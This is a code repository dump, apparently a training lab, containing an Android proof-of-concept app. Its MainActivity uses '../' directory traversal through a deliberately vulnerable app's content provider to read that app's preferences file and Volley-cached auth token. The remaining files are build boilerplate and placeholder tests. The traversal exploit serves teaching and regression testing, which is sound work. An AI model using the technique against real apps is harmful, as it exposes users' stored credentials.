├── ExploitDirectoryTraversal
├── .gitignore
├── .idea
│ ├── codeStyles
│ │ └── Project.xml
│ ├── gradle.xml
│ ├── misc.xml
│ ├── runConfigurations.xml
│ └── vcs.xml
├── app
│ ├── .gitignore
│ ├── build.gradle
│ ├── proguard-rules.pro
│ └── src
│ │ ├── androidTest
│ │ └── java
│ │ │ └── dev
│ │ │ └── d0nut
│ │ │ └── exploit
│ │ │ └── exploitdirectorytraversal
│ │ │ └── ExampleInstrumentedTest.java
│ │ ├── main
│ │ ├── AndroidManifest.xml
│ │ ├── java
│ │ │ └── dev
│ │ │ │ └── d0nut
│ │ │ │ └── exploit
│ │ │ │ └── exploitdirectorytraversal
│ │ │ │ └── MainActivity.java
│ │ └── res
│ │ │ ├── drawable-v24
│ │ │ └── ic_launcher_foreground.xml
│ │ │ ├── drawable
│ │ │ └── ic_launcher_background.xml
│ │ │ ├── mipmap-anydpi-v26
│ │ │ ├── ic_launcher.xml
│ │ │ └── ic_launcher_round.xml
│ │ │ ├── mipmap-hdpi
│ │ │ ├── ic_launcher.png
│ │ │ └── ic_launcher_round.png
│ │ │ ├── mipmap-mdpi
│ │ │ ├── ic_launcher.png
│ │ │ └── ic_launcher_round.png
│ │ │ ├── mipmap-xhdpi
│ │ │ ├── ic_launcher.png
│ │ │ └── ic_launcher_round.png
│ │ │ ├── mipmap-xxhdpi
│ │ │ ├── ic_launcher.png
│ │ │ └── ic_launcher_round.png
│ │ │ ├── mipmap-xxxhdpi
│ │ │ ├── ic_launcher.png
│ │ │ └── ic_launcher_round.png
│ │ │ └── values
│ │ │ ├── colors.xml
│ │ │ ├── strings.xml
│ │ │ └── styles.xml
│ │ └── test
│ │ └── java
│ │ └── dev
│ │ └── d0nut
│ │ └── exploit
│ │ └── exploitdirectorytraversal
│ │ └── ExampleUnitTest.java
├── build.gradle
├── gradle.properties
├── gradle
│ └── wrapper
│ │ ├── gradle-wrapper.jar
│ │ └── gradle-wrapper.properties
├── gradlew
├── gradlew.bat
└── settings.gradle
├── FileApp
├── .gitignore
├── .idea
│ ├── codeStyles
│ │ └── Project.xml
│ └── runConfigurations.xml
├── app
│ ├── .gitignore
│ ├── build.gradle
│ ├── proguard-rules.pro
│ └── src
│ │ ├── androidTest
│ │ └── java
│ │ │ └── dev
│ │ │ └── d0nut
│ │ │ └── vuln
│ │ │ └── fileapp
│ │ │ └── ExampleInstrumentedTest.java
│ │ ├── main
│ │ ├── AndroidManifest.xml
│ │ ├── java
│ │ │ └── dev
│ │ │ │ └── d0nut
│ │ │ │ └── vuln
│ │ │ │ └── fileapp
│ │ │ │ ├── ConfigActivity.java
│ │ │ │ ├── CustomContentProvider.java
│ │ │ │ ├── FileApplication.java
│ │ │ │ ├── FileListActivity.java
│ │ │ │ └── LoginActivity.java
│ │ └── res
│ │ │ ├── drawable-v24
│ │ │ └── ic_launcher_foreground.xml
│ │ │ ├── drawable
│ │ │ ├── back.png
│ │ │ ├── donut.png
│ │ │ ├── folder.png
│ │ │ ├── gear.png
│ │ │ ├── ic_launcher_background.xml
│ │ │ ├── icon_document.png
│ │ │ ├── icon_excel.png
│ │ │ ├── icon_image.png
│ │ │ └── icon_pdf.png
│ │ │ ├── layout
│ │ │ ├── activity_config.xml
│ │ │ ├── activity_files.xml
│ │ │ ├── activity_main.xml
│ │ │ └── item_file.xml
│ │ │ ├── mipmap-anydpi-v26
│ │ │ ├── ic_launcher.xml
│ │ │ └── ic_launcher_round.xml
│ │ │ ├── mipmap-hdpi
│ │ │ ├── ic_launcher.png
│ │ │ └── ic_launcher_round.png
│ │ │ ├── mipmap-mdpi
│ │ │ ├── ic_launcher.png
│ │ │ └── ic_launcher_round.png
│ │ │ ├── mipmap-xhdpi
│ │ │ ├── ic_launcher.png
│ │ │ └── ic_launcher_round.png
│ │ │ ├── mipmap-xxhdpi
│ │ │ ├── ic_launcher.png
│ │ │ └── ic_launcher_round.png
│ │ │ ├── mipmap-xxxhdpi
│ │ │ ├── ic_launcher.png
│ │ │ └── ic_launcher_round.png
│ │ │ ├── values
│ │ │ ├── colors.xml
│ │ │ ├── strings.xml
│ │ │ └── styles.xml
│ │ │ └── xml
│ │ │ └── filepaths.xml
│ │ └── test
│ │ └── java
│ │ └── dev
│ │ └── d0nut
│ │ └── vuln
│ │ └── fileapp
│ │ └── ExampleUnitTest.java
├── build.gradle
├── gradle.properties
├── gradle
│ └── wrapper
│ │ ├── gradle-wrapper.jar
│ │ └── gradle-wrapper.properties
├── gradlew
├── gradlew.bat
└── settings.gradle
├── README.md
└── server
├── app.py
└── requirements.txt
/ExploitDirectoryTraversal/.gitignore:
--------------------------------------------------------------------------------
1 | *.iml
2 | .gradle
3 | /local.properties
4 | /.idea/caches
5 | /.idea/libraries
6 | /.idea/modules.xml
7 | /.idea/workspace.xml
8 | /.idea/navEditor.xml
9 | /.idea/assetWizardSettings.xml
10 | .DS_Store
11 | /build
12 | /captures
13 | .externalNativeBuild
14 | .cxx
15 |
--------------------------------------------------------------------------------
/ExploitDirectoryTraversal/.idea/codeStyles/Project.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 | xmlns:android
14 |
15 | ^$
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 | xmlns:.*
25 |
26 | ^$
27 |
28 |
29 | BY_NAME
30 |
31 |
32 |
33 |
34 |
35 |
36 | .*:id
37 |
38 | http://schemas.android.com/apk/res/android
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 | .*:name
48 |
49 | http://schemas.android.com/apk/res/android
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 | name
59 |
60 | ^$
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 | style
70 |
71 | ^$
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 | .*
81 |
82 | ^$
83 |
84 |
85 | BY_NAME
86 |
87 |
88 |
89 |
90 |
91 |
92 | .*
93 |
94 | http://schemas.android.com/apk/res/android
95 |
96 |
97 | ANDROID_ATTRIBUTE_ORDER
98 |
99 |
100 |
101 |
102 |
103 |
104 | .*
105 |
106 | .*
107 |
108 |
109 | BY_NAME
110 |
111 |
112 |
113 |
114 |
115 |
116 |
--------------------------------------------------------------------------------
/ExploitDirectoryTraversal/.idea/gradle.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
19 |
20 |
--------------------------------------------------------------------------------
/ExploitDirectoryTraversal/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/ExploitDirectoryTraversal/.idea/runConfigurations.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
--------------------------------------------------------------------------------
/ExploitDirectoryTraversal/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/ExploitDirectoryTraversal/app/.gitignore:
--------------------------------------------------------------------------------
1 | /build
2 |
--------------------------------------------------------------------------------
/ExploitDirectoryTraversal/app/build.gradle:
--------------------------------------------------------------------------------
// Build script for the :app module of the proof-of-concept client.
apply plugin: 'com.android.application'

android {
    compileSdkVersion 29
    buildToolsVersion "29.0.3"

    defaultConfig {
        // Package name of the PoC app; ExampleInstrumentedTest asserts this exact value.
        applicationId "dev.d0nut.exploit.exploitdirectorytraversal"
        minSdkVersion 24
        targetSdkVersion 29
        versionCode 1
        versionName "1.0"

        testInstrumentationRunner "androidx.test.runner.AndroidJUnitRunner"
    }

    buildTypes {
        release {
            // Shrinking is switched off, so the ProGuard files listed below are not applied
            // to release builds unless this flag is turned on.
            minifyEnabled false
            proguardFiles getDefaultProguardFile('proguard-android-optimize.txt'), 'proguard-rules.pro'
        }
    }

}

dependencies {
    // NOTE(review): any jar placed in libs/ is linked into the app without a declared
    // version or checksum. Prefer pinned coordinates, or review what lands in libs/.
    implementation fileTree(dir: 'libs', include: ['*.jar'])

    implementation 'androidx.appcompat:appcompat:1.1.0'
    // Test-only dependencies; they are not packaged into the installed app.
    testImplementation 'junit:junit:4.12'
    androidTestImplementation 'androidx.test.ext:junit:1.1.1'
    androidTestImplementation 'androidx.test.espresso:espresso-core:3.2.0'
}
34 |
--------------------------------------------------------------------------------
/ExploitDirectoryTraversal/app/proguard-rules.pro:
--------------------------------------------------------------------------------
1 | # Add project specific ProGuard rules here.
2 | # You can control the set of applied configuration files using the
3 | # proguardFiles setting in build.gradle.
4 | #
5 | # For more details, see
6 | # http://developer.android.com/guide/developing/tools/proguard.html
7 |
8 | # If your project uses WebView with JS, uncomment the following
9 | # and specify the fully qualified class name to the JavaScript interface
10 | # class:
11 | #-keepclassmembers class fqcn.of.javascript.interface.for.webview {
12 | # public *;
13 | #}
14 |
15 | # Uncomment this to preserve the line number information for
16 | # debugging stack traces.
17 | #-keepattributes SourceFile,LineNumberTable
18 |
19 | # If you keep the line number information, uncomment this to
20 | # hide the original source file name.
21 | #-renamesourcefileattribute SourceFile
22 |
--------------------------------------------------------------------------------
/ExploitDirectoryTraversal/app/src/androidTest/java/dev/d0nut/exploit/exploitdirectorytraversal/ExampleInstrumentedTest.java:
--------------------------------------------------------------------------------
1 | package dev.d0nut.exploit.exploitdirectorytraversal;
2 |
3 | import android.content.Context;
4 |
5 | import androidx.test.platform.app.InstrumentationRegistry;
6 | import androidx.test.ext.junit.runners.AndroidJUnit4;
7 |
8 | import org.junit.Test;
9 | import org.junit.runner.RunWith;
10 |
11 | import static org.junit.Assert.*;
12 |
/**
 * Device-side smoke test: runs under instrumentation on an Android device or emulator
 * and checks that the package under test is the proof-of-concept client.
 */
@RunWith(AndroidJUnit4.class)
public class ExampleInstrumentedTest {
    @Test
    public void useAppContext() {
        // The target context belongs to the app under test, not to the test APK.
        final String expectedPackage = "dev.d0nut.exploit.exploitdirectorytraversal";
        final Context targetContext =
                InstrumentationRegistry.getInstrumentation().getTargetContext();

        assertEquals(expectedPackage, targetContext.getPackageName());
    }
}
28 |
--------------------------------------------------------------------------------
/ExploitDirectoryTraversal/app/src/main/AndroidManifest.xml:
--------------------------------------------------------------------------------
1 |
3 |
4 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/ExploitDirectoryTraversal/app/src/main/java/dev/d0nut/exploit/exploitdirectorytraversal/MainActivity.java:
--------------------------------------------------------------------------------
1 | package dev.d0nut.exploit.exploitdirectorytraversal;
2 |
3 | import android.app.Activity;
4 | import android.net.Uri;
5 | import android.os.Bundle;
6 | import android.widget.Toast;
7 |
8 | import androidx.annotation.Nullable;
9 |
10 | import java.io.ByteArrayOutputStream;
11 | import java.io.FileNotFoundException;
12 | import java.io.IOException;
13 | import java.io.InputStream;
14 | import java.util.regex.Matcher;
15 | import java.util.regex.Pattern;
16 |
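/**
 * Proof-of-concept client for the deliberately vulnerable FileApp that ships in this
 * repository.
 *
 * <p>Every read goes through {@code content://dev.d0nut.vuln.fileapp.fileprovider/} with a
 * {@code ../} segment in the path, i.e. the client asks the target's provider for files that
 * sit outside the directory the provider is presumably meant to serve (the shared
 * preferences file and the Volley HTTP cache). Whether such a request succeeds is decided
 * entirely by the provider, whose source is not part of this class.
 *
 * <p>Defensive reading: a provider that opens files from a caller-supplied path has to
 * resolve the canonical path and reject anything outside its base directory, and it should
 * not be reachable by other apps unless that is required. Against a provider that does so,
 * this activity reports the files as not readable instead of crashing, which makes it usable
 * as a regression check for the fix.
 */
public class MainActivity extends Activity {
    /** Captures the value that follows the {@code server_address} preference name. */
    private static final Pattern SERVER_ADDRESS = Pattern.compile("server_address\">([^<]+)");

    /** Captures the value of a JSON {@code "token"} string field. */
    private static final Pattern TOKEN = Pattern.compile("\"token\":\"([^\"]+)");

    @Override
    protected void onCreate(@Nullable Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);

        String serverAddress = readServerAddress();
        if (serverAddress == null) {
            // The provider refused the read or the preference is absent: say so and stop,
            // rather than failing later with a NullPointerException.
            Toast.makeText(this, "server_address not readable", Toast.LENGTH_SHORT).show();
            return;
        }

        Toast.makeText(this, serverAddress, Toast.LENGTH_SHORT).show();

        String endpoint = serverAddress + "/api/auth";
        String token = getToken(endpoint);

        Toast.makeText(this, token != null ? token : "token not readable", Toast.LENGTH_SHORT).show();
    }

    /**
     * Reads the target's preferences file through the provider and extracts the configured
     * server address.
     *
     * @return the server address, or {@code null} if the file could not be read or holds no
     *         such entry
     */
    private String readServerAddress() {
        return firstGroup(SERVER_ADDRESS, readRemoteFile("../shared_prefs/preferences.xml"));
    }

    /**
     * Reads the cache entry for the given endpoint through the provider and extracts the
     * token stored in it.
     *
     * <p>Defensive reading: a credential that is written to an on-disk HTTP cache is exposed
     * to any file-read weakness in the app; the target-side mitigation is to keep
     * authentication responses out of the cache.
     *
     * @param serverAddress full URL of the authentication endpoint
     * @return the token, or {@code null} if the entry could not be read or holds no token
     */
    private String getToken(String serverAddress) {
        String cacheFileContents =
                readRemoteFile("../cache/volley/" + calculateCacheFilename(serverAddress));

        return firstGroup(TOKEN, cacheFileContents);
    }

    /**
     * Derives a file name from the key {@code "1-" + serverAddress} by concatenating the
     * {@code hashCode()} of each half of the key.
     *
     * <p>NOTE(review): this appears to mirror the file naming of Volley's disk cache, given
     * the {@code cache/volley} directory used by the caller; confirm against the Volley
     * version the target app ships.
     */
    private String calculateCacheFilename(String serverAddress) {
        String key = "1-" + serverAddress;

        int firstHalfLength = key.length() / 2;
        String localFilename = String.valueOf(key.substring(0, firstHalfLength).hashCode());
        localFilename += String.valueOf(key.substring(firstHalfLength).hashCode());
        return localFilename;
    }

    /**
     * Returns the first capture group of the first match, or {@code null} when the text is
     * missing or does not match.
     */
    private static String firstGroup(Pattern pattern, String text) {
        if (text == null) {
            return null;
        }

        Matcher matcher = pattern.matcher(text);
        // group(1) is only valid after a successful find().
        return matcher.find() ? matcher.group(1) : null;
    }

    /**
     * Opens {@code path} relative to the target provider's authority and returns the content
     * decoded as UTF-8.
     *
     * @param path path appended verbatim to the provider URI
     * @return the file content, or {@code null} if the provider did not serve the file
     */
    private String readRemoteFile(String path) {
        Uri contentUri = Uri.parse("content://dev.d0nut.vuln.fileapp.fileprovider/" + path);

        // try-with-resources closes the stream on every path; a null resource is skipped.
        try (InputStream stream = getContentResolver().openInputStream(contentUri)) {
            if (stream == null) {
                return null;
            }

            ByteArrayOutputStream buffer = new ByteArrayOutputStream();
            byte[] bytes = new byte[16000];
            int nRead;

            while ((nRead = stream.read(bytes, 0, bytes.length)) != -1) {
                // Copy only the bytes this read produced; writing the whole array would
                // append stale data from the previous iteration or trailing zeros.
                buffer.write(bytes, 0, nRead);
            }

            return new String(buffer.toByteArray(), "UTF-8");
        } catch (IOException | SecurityException e) {
            // IOException covers FileNotFoundException; SecurityException is what a
            // provider that is not accessible to this app raises.
            e.printStackTrace();
        }

        return null;
    }
}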
87 |
--------------------------------------------------------------------------------
/ExploitDirectoryTraversal/app/src/main/res/drawable-v24/ic_launcher_foreground.xml:
--------------------------------------------------------------------------------
1 |
7 |
8 |
9 |
15 |
18 |
21 |
22 |
23 |
24 |
30 |
--------------------------------------------------------------------------------
/ExploitDirectoryTraversal/app/src/main/res/drawable/ic_launcher_background.xml:
--------------------------------------------------------------------------------
1 |
2 |
7 |
10 |
15 |
20 |
25 |
30 |
35 |
40 |
45 |
50 |
55 |
60 |
65 |
70 |
75 |
80 |
85 |
90 |
95 |
100 |
105 |
110 |
115 |
120 |
125 |
130 |
135 |
140 |
145 |
150 |
155 |
160 |
165 |
170 |
171 |
--------------------------------------------------------------------------------
/ExploitDirectoryTraversal/app/src/main/res/mipmap-anydpi-v26/ic_launcher.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/ExploitDirectoryTraversal/app/src/main/res/mipmap-anydpi-v26/ic_launcher_round.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/ExploitDirectoryTraversal/app/src/main/res/mipmap-hdpi/ic_launcher.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/ExploitDirectoryTraversal/app/src/main/res/mipmap-hdpi/ic_launcher.png
--------------------------------------------------------------------------------
/ExploitDirectoryTraversal/app/src/main/res/mipmap-hdpi/ic_launcher_round.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/ExploitDirectoryTraversal/app/src/main/res/mipmap-hdpi/ic_launcher_round.png
--------------------------------------------------------------------------------
/ExploitDirectoryTraversal/app/src/main/res/mipmap-mdpi/ic_launcher.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/ExploitDirectoryTraversal/app/src/main/res/mipmap-mdpi/ic_launcher.png
--------------------------------------------------------------------------------
/ExploitDirectoryTraversal/app/src/main/res/mipmap-mdpi/ic_launcher_round.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/ExploitDirectoryTraversal/app/src/main/res/mipmap-mdpi/ic_launcher_round.png
--------------------------------------------------------------------------------
/ExploitDirectoryTraversal/app/src/main/res/mipmap-xhdpi/ic_launcher.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/ExploitDirectoryTraversal/app/src/main/res/mipmap-xhdpi/ic_launcher.png
--------------------------------------------------------------------------------
/ExploitDirectoryTraversal/app/src/main/res/mipmap-xhdpi/ic_launcher_round.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/ExploitDirectoryTraversal/app/src/main/res/mipmap-xhdpi/ic_launcher_round.png
--------------------------------------------------------------------------------
/ExploitDirectoryTraversal/app/src/main/res/mipmap-xxhdpi/ic_launcher.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/ExploitDirectoryTraversal/app/src/main/res/mipmap-xxhdpi/ic_launcher.png
--------------------------------------------------------------------------------
/ExploitDirectoryTraversal/app/src/main/res/mipmap-xxhdpi/ic_launcher_round.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/ExploitDirectoryTraversal/app/src/main/res/mipmap-xxhdpi/ic_launcher_round.png
--------------------------------------------------------------------------------
/ExploitDirectoryTraversal/app/src/main/res/mipmap-xxxhdpi/ic_launcher.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/ExploitDirectoryTraversal/app/src/main/res/mipmap-xxxhdpi/ic_launcher.png
--------------------------------------------------------------------------------
/ExploitDirectoryTraversal/app/src/main/res/mipmap-xxxhdpi/ic_launcher_round.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/ExploitDirectoryTraversal/app/src/main/res/mipmap-xxxhdpi/ic_launcher_round.png
--------------------------------------------------------------------------------
/ExploitDirectoryTraversal/app/src/main/res/values/colors.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 | #6200EE
4 | #3700B3
5 | #03DAC5
6 |
7 |
--------------------------------------------------------------------------------
/ExploitDirectoryTraversal/app/src/main/res/values/strings.xml:
--------------------------------------------------------------------------------
1 |
2 | ExploitLFI
3 |
4 |
--------------------------------------------------------------------------------
/ExploitDirectoryTraversal/app/src/main/res/values/styles.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
10 |
11 |
12 |
--------------------------------------------------------------------------------
/ExploitDirectoryTraversal/app/src/test/java/dev/d0nut/exploit/exploitdirectorytraversal/ExampleUnitTest.java:
--------------------------------------------------------------------------------
1 | package dev.d0nut.exploit.exploitdirectorytraversal;
2 |
3 | import org.junit.Test;
4 |
5 | import static org.junit.Assert.*;
6 |
/**
 * Placeholder local unit test; it runs on the development machine (host JVM), not on a
 * device.
 */
public class ExampleUnitTest {
    @Test
    public void addition_isCorrect() {
        final int expected = 4;
        final int actual = 2 + 2;

        assertEquals(expected, actual);
    }
}
--------------------------------------------------------------------------------
/ExploitDirectoryTraversal/build.gradle:
--------------------------------------------------------------------------------
// Top-level build file where you can add configuration options common to all sub-projects/modules.

buildscript {

    repositories {
        google()
        // NOTE(review): JCenter has been sunset by its operator. Build plugins resolved
        // from it are part of the build's trust boundary, so prefer mavenCentral() here
        // after confirming that every plugin dependency still resolves.
        jcenter()

    }
    dependencies {
        // Android Gradle plugin; it runs with the privileges of whoever invokes the build.
        classpath 'com.android.tools.build:gradle:3.6.3'


        // NOTE: Do not place your application dependencies here; they belong
        // in the individual module build.gradle files
    }
}

allprojects {
    repositories {
        google()
        // NOTE(review): same concern as in the buildscript block; application
        // dependencies are resolved from this repository list.
        jcenter()

    }
}

// Removes the root project's build output directory.
task clean(type: Delete) {
    delete rootProject.buildDir
}
30 |
--------------------------------------------------------------------------------
/ExploitDirectoryTraversal/gradle.properties:
--------------------------------------------------------------------------------
1 | # Project-wide Gradle settings.
2 | # IDE (e.g. Android Studio) users:
3 | # Gradle settings configured through the IDE *will override*
4 | # any settings specified in this file.
5 | # For more details on how to configure your build environment visit
6 | # http://www.gradle.org/docs/current/userguide/build_environment.html
7 | # Specifies the JVM arguments used for the daemon process.
8 | # The setting is particularly useful for tweaking memory settings.
9 | org.gradle.jvmargs=-Xmx1536m
10 | # When configured, Gradle will run in incubating parallel mode.
11 | # This option should only be used with decoupled projects. More details, visit
12 | # http://www.gradle.org/docs/current/userguide/multi_project_builds.html#sec:decoupled_projects
13 | # org.gradle.parallel=true
14 | # AndroidX package structure to make it clearer which packages are bundled with the
15 | # Android operating system, and which are packaged with your app's APK
16 | # https://developer.android.com/topic/libraries/support-library/androidx-rn
17 | android.useAndroidX=true
18 | # Automatically convert third-party libraries to use AndroidX
19 | android.enableJetifier=true
20 |
21 |
--------------------------------------------------------------------------------
/ExploitDirectoryTraversal/gradle/wrapper/gradle-wrapper.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/ExploitDirectoryTraversal/gradle/wrapper/gradle-wrapper.jar
--------------------------------------------------------------------------------
/ExploitDirectoryTraversal/gradle/wrapper/gradle-wrapper.properties:
--------------------------------------------------------------------------------
#Sat May 02 15:38:39 PDT 2020
# NOTE(review): no distributionSha256Sum is set, so the wrapper does not checksum-verify
# the distribution it downloads from distributionUrl. Consider adding
# distributionSha256Sum=<SHA-256 of gradle-5.6.4-all.zip as published by Gradle>
distributionBase=GRADLE_USER_HOME
distributionPath=wrapper/dists
zipStoreBase=GRADLE_USER_HOME
zipStorePath=wrapper/dists
distributionUrl=https\://services.gradle.org/distributions/gradle-5.6.4-all.zip
7 |
--------------------------------------------------------------------------------
/ExploitDirectoryTraversal/gradlew:
--------------------------------------------------------------------------------
#!/usr/bin/env sh

# Purpose: locate this script's directory (APP_HOME), pick a java executable, and start
# org.gradle.wrapper.GradleWrapperMain from gradle/wrapper/gradle-wrapper.jar with the
# caller's arguments.

##############################################################################
##
## Gradle start up script for UN*X
##
##############################################################################

# Attempt to set APP_HOME
# Resolve links: $0 may be a link
PRG="$0"
# Need this for relative symlinks.
while [ -h "$PRG" ] ; do
    ls=`ls -ld "$PRG"`
    link=`expr "$ls" : '.*-> \(.*\)$'`
    if expr "$link" : '/.*' > /dev/null; then
        PRG="$link"
    else
        PRG=`dirname "$PRG"`"/$link"
    fi
done
SAVED="`pwd`"
cd "`dirname \"$PRG\"`/" >/dev/null
APP_HOME="`pwd -P`"
cd "$SAVED" >/dev/null

APP_NAME="Gradle"
APP_BASE_NAME=`basename "$0"`

# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script.
DEFAULT_JVM_OPTS=""

# Use the maximum available, or set MAX_FD != -1 to use that value.
MAX_FD="maximum"

# Print a warning and continue.
warn () {
    echo "$*"
}

# Print an error framed by blank lines and exit with status 1.
die () {
    echo
    echo "$*"
    echo
    exit 1
}

# OS specific support (must be 'true' or 'false').
cygwin=false
msys=false
darwin=false
nonstop=false
case "`uname`" in
  CYGWIN* )
    cygwin=true
    ;;
  Darwin* )
    darwin=true
    ;;
  MINGW* )
    msys=true
    ;;
  NONSTOP* )
    nonstop=true
    ;;
esac

# NOTE(review): the JVM is started from the wrapper jar checked in next to this script, so
# that binary runs with the invoking user's privileges. Verify it against the checksum
# Gradle publishes for this wrapper version before trusting a fresh checkout.
CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar

# Determine the Java command to use to start the JVM.
if [ -n "$JAVA_HOME" ] ; then
    if [ -x "$JAVA_HOME/jre/sh/java" ] ; then
        # IBM's JDK on AIX uses strange locations for the executables
        JAVACMD="$JAVA_HOME/jre/sh/java"
    else
        JAVACMD="$JAVA_HOME/bin/java"
    fi
    if [ ! -x "$JAVACMD" ] ; then
        die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME

Please set the JAVA_HOME variable in your environment to match the
location of your Java installation."
    fi
else
    JAVACMD="java"
    which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH.

Please set the JAVA_HOME variable in your environment to match the
location of your Java installation."
fi

# Increase the maximum file descriptors if we can.
if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then
    MAX_FD_LIMIT=`ulimit -H -n`
    if [ $? -eq 0 ] ; then
        if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then
            MAX_FD="$MAX_FD_LIMIT"
        fi
        ulimit -n $MAX_FD
        if [ $? -ne 0 ] ; then
            warn "Could not set maximum file descriptor limit: $MAX_FD"
        fi
    else
        warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT"
    fi
fi

# For Darwin, add options to specify how the application appears in the dock
if $darwin; then
    GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\""
fi

# For Cygwin, switch paths to Windows format before running java
if $cygwin ; then
    APP_HOME=`cygpath --path --mixed "$APP_HOME"`
    CLASSPATH=`cygpath --path --mixed "$CLASSPATH"`
    JAVACMD=`cygpath --unix "$JAVACMD"`

    # We build the pattern for arguments to be converted via cygpath
    ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null`
    SEP=""
    for dir in $ROOTDIRSRAW ; do
        ROOTDIRS="$ROOTDIRS$SEP$dir"
        SEP="|"
    done
    OURCYGPATTERN="(^($ROOTDIRS))"
    # Add a user-defined pattern to the cygpath arguments
    if [ "$GRADLE_CYGPATTERN" != "" ] ; then
        OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)"
    fi
    # Now convert the arguments - kludge to limit ourselves to /bin/sh
    i=0
    for arg in "$@" ; do
        CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -`
        CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option

        if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition
            eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"`
        else
            eval `echo args$i`="\"$arg\""
        fi
        i=$((i+1))
    done
    # Only the first nine converted arguments are re-installed as positional parameters.
    case $i in
        (0) set -- ;;
        (1) set -- "$args0" ;;
        (2) set -- "$args0" "$args1" ;;
        (3) set -- "$args0" "$args1" "$args2" ;;
        (4) set -- "$args0" "$args1" "$args2" "$args3" ;;
        (5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;;
        (6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;;
        (7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;;
        (8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;;
        (9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;;
    esac
fi

# Escape application args
# Each argument is wrapped in single quotes, with embedded single quotes escaped, so the
# eval below hands it to java unchanged.
save () {
    for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done
    echo " "
}
APP_ARGS=$(save "$@")

# Collect all arguments for the java command, following the shell quoting and substitution rules
# NOTE(review): DEFAULT_JVM_OPTS, JAVA_OPTS and GRADLE_OPTS are expanded unquoted and then
# re-parsed by eval, so their contents are interpreted as shell syntax. Only run this
# script where those environment variables come from a trusted source (CI settings included).
eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS"

# by default we should be in the correct project dir, but when run from Finder on Mac, the cwd is wrong
if [ "$(uname)" = "Darwin" ] && [ "$HOME" = "$PWD" ]; then
    cd "$(dirname "$0")"
fi

# Replace this shell with the JVM; nothing after this line runs.
exec "$JAVACMD" "$@"
173 |
--------------------------------------------------------------------------------
/ExploitDirectoryTraversal/gradlew.bat:
--------------------------------------------------------------------------------
